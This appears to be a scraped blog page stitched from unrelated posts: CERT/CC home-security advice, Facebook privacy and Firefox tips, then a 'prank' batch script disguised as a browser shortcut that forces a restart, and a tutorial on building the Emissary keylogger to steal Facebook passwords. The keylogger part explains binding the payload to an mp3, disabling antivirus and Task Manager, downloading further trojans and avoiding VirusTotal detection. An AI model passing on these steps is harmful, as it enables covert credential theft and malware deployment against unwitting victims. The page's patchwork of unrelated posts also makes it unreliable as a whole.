0
07.20Konsultasikan personal support anda jika Anda bekerja dan selalu terhubung dengan internet
- Use virus protection software
- Use a firewall
- Don't open unknown email attachments
- be sure your virus definitions are up-to-date (see "Use virus protection software" above)
- save the file to your hard disk
- scan the file using your antivirus software
- open the file
- Don't run programs of unknown origin
- Disable hidden filename extensions
- Keep all applications, including your operating system, patched
- Turn off your computer or disconnect from the network when not in use
- Disable Java, JavaScript, and ActiveX if possible
- Disable scripting features in email programs
- Make regular backups of critical data
- Make a boot disk in case your computer is damaged or compromised
Jika Anda menggunakan akses broadband Anda dapat terhubung ke jaringan kerja Anda melalui Virtual Private Network (VPN) atau cara lain, mungkin administrator jaringan memiliki kebijakan atau prosedur yang berkaitan dengan keamanan jaringan Anda. Selalu berkonsultasi dengan personel support administrator jaringan, sebagaimana mestinya, sebelum mengikuti salah satu langkah yang dijelaskan dalam dokumen ini.
The CERT/CC recommends the use of anti-virus software on all Internet-connected computers. Be sure to keep your anti-virus software up-to-date. Many anti-virus packages support automatic updates of virus definitions. We recommend the use of these automatic updates when available.
We strongly recommend the use of some type of firewall product, such as a network appliance or a personal firewall software package. Intruders are constantly scanning home user systems for known vulnerabilities. Network firewalls (whether software or hardware-based) can provide some degree of protection against these attacks. However, no firewall can detect or stop all attacks, so it’s not sufficient to install a firewall and then ignore all other security measures.
Before opening any email attachments, be sure you know the source of the attachment. It is not enough that the mail originated from an address you recognize. The Melissa virus spread precisely because it originated from a familiar address. Malicious code might be distributed in amusing or enticing programs.
If you must open an attachment before you can verify the source, we suggest the following procedure:
For additional protection, you can disconnect your computer's network connection before opening the file.
Following these steps will reduce, but not wholly eliminate, the chance that any malicious code contained in the attachment might spread from your computer to others.
Never run a program unless you know it to be authored by a person or company that you trust. Also, don't send programs of unknown origin to your friends or coworkers simply because they are amusing -- they might contain a Trojan horse program.
Windows operating systems contain an option to "Hide file extensions for known file types". The option is enabled by default, but you can disable this option in order to have file extensions displayed by Windows. After disabling this option, there are still some file extensions that, by default, will continue to remain hidden.
There is a registry value which, if set, will cause Windows to hide certain file extensions regardless of user configuration choices elsewhere in the operating system. The "NeverShowExt" registry value is used to hide the extensions for basic Windows file types. For example, the ".LNK" extension associated with Windows shortcuts remains hidden even after a user has turned off the option to hide extensions.
Specific instructions for disabling hidden file name extensions are given in http://www.cert.org/incident_notes/IN-2000-07.html
Vendors will usually release patches for their software when a vulnerability has been discovered. Most product documentation offers a method to get updates and patches. You should be able to obtain updates from the vendor's web site. Read the manuals or browse the vendor's web site for more information.
Some applications will automatically check for available updates, and many vendors offer automatic notification of updates via a mailing list. Look on your vendor's web site for information about automatic notification. If no mailing list or other automated notification mechanism is offered you may need to check periodically for updates.
Turn off your computer or disconnect its Ethernet interface when you are not using it. An intruder cannot attack your computer if it is powered off or otherwise completely disconnected from the network.
Be aware of the risks involved in the use of "mobile code" such as ActiveX, Java, and JavaScript. A malicious web developer may attach a script to something sent to a web site, such as a URL, an element in a form, or a database inquiry. Later, when the web site responds to you, the malicious script is transferred to your browser.
The most significant impact of this vulnerability can be avoided by disabling all scripting languages. Turning off these options will keep you from being vulnerable to malicious scripts. However, it will limit the interaction you can have with some web sites.
Many legitimate sites use scripts running within the browser to add useful features. Disabling scripting may degrade the functionality of these sites.
More information on ActiveX security, including recommendations for users who administer their own computers, is available in http://www.cert.org/archive/pdf/activeX_report.pdf
More information regarding the risks posed by malicious code in web links can be found in CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests.
Because many email programs use the same code as web browsers to display HTML, vulnerabilities that affect ActiveX, Java, and JavaScript are often applicable to email as well as web pages. Therefore, in addition to disabling scripting features in web browsers (see "Disable Java, JavaScript, and ActiveX if possible", above), we recommend that users also disable these features in their email programs.
Keep a copy of important files on removable media such as ZIP disks or recordable CD-ROM disks (CD-R or CD-RW disks). Use software backup tools if available, and store the backup disks somewhere away from the computer.
To aid in recovering from a security breach or hard disk failure, create a boot disk on a floppy disk which will help when recovering a computer after such an event has occurred. Remember, however, you must create this diskbefore you have a security event.
W e have all been there and not added people as friends to facebook because of the repurcussions it could bring. There are many reasons why you would want to hide a friend added status update on facebook. Read below to find out how its done.
On your Facebook home page, you should see the ‘Settings’ menu close to the search field on your upper-right. Open that menu and go to ‘Privacy Settings’.
On the next page, you’ll have four choices: Profile, Search, News Feed, and Applications. What you’ll want to edit here are your Profile privacy settings.
By default, everything on your profile is limited to your Friends and your Networks (your first Network is likely your city of residence, but you may have joined more). From the screenshot above, you can see that I’ve limited everything on my profile to my Friends and their Friends. Anyone else who visits my profile will only see that I have a profile, but will not see what’s on it.
In my example, you’re going to want to edit the setting on your Status Updates, since you don’t want your boss to know that you’ve “fanned” the competition. Click that dropdown menu and then select ‘Customize’.
You may want to tweak your overall privacy setting here, but what we’re aiming for is the “Except These People” list at the bottom of this dialog. Type out the name of any of your Friends to restrict that person from viewing anything in your Status Updates.
How to Place Facebook Chat On Firefox Sidebar
Facebook Chat is cool, at least it allows you to send instant messages to online Facebook contacts. However I’m not really a fan of the chat bar being at the bottom of the page, what if I’ve left Facebook but still wants to remain chatting with my Facebookcontacts? If you are using Firefox, you can place the Facebook Chat at the sidebar
Step 1
Look for Bookmarks on the top navigation. Select Organize Bookmarks…
Step 2
Click New Bookmark... tab and enter the following:
•Name: Facebook Chat
•Location: http://www.facebook.com/presence/popout.php
•Check Load this bookmark in sidebar.
Step 3
Launch the Firefox sidebar, click Facebook Chat and start chatting with your Facebook contacts within Firefox
If you have a lot of friends on Facebook, you may not have the time to keep up with all of the new family photos they’ve posted – but you are very interested in them and would love to have them stored in your own private photo collection to review later. Well, thanks to a very cool FireFox plug-in called FacePAD, you can do just that. The add-on is awesome!
After you install the FacePad plug-in, make sure you select Tools->Add-Ons, and configure the options for FacePad so it has your correct Facebook language. Then, all you have to do is go to your friend’s photo albums, right-click on the title and select “Download Album With FacePAD.” That’s right, you’re not downloading a single picture – but an entire album.
Once you do, FacePad downloads every single image within that album into the download folder you’ve configured in FireFox.
In this post i'll show you an easy step by step tutorial about how to make a Facebook virus using simple commands on notepad. This will make the victims think that they have a virus when they click on an icon such as Internet Explorer or Mozilla Firefox...
This "virus" is totlly harmless and won't do any damage to your victims computer.
When a victim clicks on the icon he will get a warning message like "WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!". You can change the text to whatever you want. If you have some other interesting ideas, let me know. This virus doesn't do anything to your friends pc, but to see his scared face, that's something :)...
Now let's start with the tutorial:
1) Open notepad
2) Type the following text in :
@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."
3) Save as Internet Explorer .bat (or whatever you want, but be shure that the last letters are .bat)
4) Right click on Internet Explorer .bat and click Create Shortcut
5) Right click on shorcut and click Properties.
6)Click Change Icon
7) Choose Internet Explorer icon (or Mozilla Firefox, or any other icon similar to it), click OK , then click Apply
8)Delete real shortcut and replace it with fake . When victim click on it , he will get warning messages that looks like this:
Hope you'll freak out friend(s).
If this prank was successful and there was some interesting reactions of your friends, feel free to share it with us.
Hacking Facebook Account Password: Facebook Keylogging for Hacking Facebook
Everyday I get emails wherein my readers ask me How to Hack a Facebook Account? You as the reader are most likely reading this because you want to hack into someone’s facebook account. So in this post I have decided to uncover the real and working way to hack any facebook account. Actually there are many ways to hack someones facebook password like Phishing, Keylogging or using Hacking softwares used to hack facebook password. In this post i'm going to show you how to hack someones facebook account password using a keylogger - Emissary Keylogger.
How to Hack Facebook Password using Keylogger?
1. First of all Download Emissary Keylogger. It takes screenshots of the victim's computer and sends it to your gmail along with the logs.
2. Make sure that you have Microsoft .Net Framework installed in your Windows. You can download it from www.microsoft.com/net/. Else it won't work.
3. Extract the files using WinRar or any other zip/unzip program.
4. Open "Emissary.exe" to see something like this:
5. Now, fill in your Gmail username and password in respective fields (You can create a gmail account that you're going to use only for keylogging). Enter the email adress where you wanna receive facebook passwords. Choose a name for the server.exe file. You can set timer as you wish. This timer controls the time interval between two logs emails.
6. In the "Options" section you can see what this evil little buddy can do ;)
•Block AV Sites: Blocks VirusScanning Websites on victim's computer
•Add to Startup: Adds to Startup via Registry
•Antis: Anubis, BitDefender, Kaspersky, Keyscrambler, Malwarebytes, NOD32, Norman, Ollydbg, Outpost, Wireshark
•Disable TaskManager: Disable TaskManager on victim's PC
•Disable Regedit: Disable's Regedit on victim's PC
7. Check "Trojan Downloader" to Downloade and Execute a trojan on victim's PC. You can also create a fake error message and scare your victim, like:
8. After you're done, hit on "Build" and you will get server keylogger file created in current directory.
9. Now, to hack facebook password, you have to send this server file to victim and make him install it on his computer. You can use Binder, Crypter or Fake Hacking Software to bind this server file with say any .mp3 file so that whenever victim runs mp3 file, server is automatically installed on his computer without his knowledge.
10. Now because this is a server.exe file you can't send it via email. Almost all email domains have security policy which does not allow sending .exe files. So to do this you need to compress the file with WinRar or upload it to Free File Storage Domains, like Mediafire, Speedyshare, Ziddu.com, etc.
11. Once the victim runs our sent keylogger file on his computer, it searches for all stored passwords and send you email containing all user-ids and passwords, like:
Now you have all victim email passwords in your inbox and you can now hack victim facebook accounts easily. I have personally tested this free keylogger and found it working 100%. Enjoy Hacking.
Very Important: Do not scan these tools on VirusTotal. Usehttp://scanner.novirusthanks.org/ and also check the "Do not distribute the sample" option.
Do you have questions, comments, or suggestions? Feel free to post a comment!
- 2008 - 2009 SimplexDesign. Content in my blog is licensed under a Creative Commons License.
- SimplexPro template designed by Simplex Design.
- Powered by Blogger.com.
This template is brought to you by : allblogtools.com | Blogger Templates